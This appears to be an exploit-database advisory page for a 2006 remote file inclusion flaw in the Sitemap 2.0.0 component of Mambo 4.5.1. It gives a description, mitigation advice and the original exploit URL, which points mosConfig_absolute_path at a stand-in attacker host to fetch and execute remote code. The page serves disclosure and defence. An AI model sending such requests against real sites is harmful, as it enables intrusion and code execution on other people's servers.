header-logo
Suggest Exploit
vendor:
Mambo
by:
Ahmad Maulana a.k.a Matdhule
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Mambo
Affected Version From: Sitemap 2.0.0
Affected Version To: Sitemap 2.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mambo_project:mambo:4.5.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Sitemap 2.0.0 for Mambo 4.5.1 CMS

Sitemap 2.0.0 for Mambo 4.5.1 CMS is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the mosConfig_absolute_path parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application. Also, ensure that the application is running with the least privileges necessary.
Source

Exploit-DB raw data:

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------ 

Application    : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version        : Sitemap 2.0.0
URL        : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip

Exploit:
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt? 

# milw0rm.com [2006-07-17]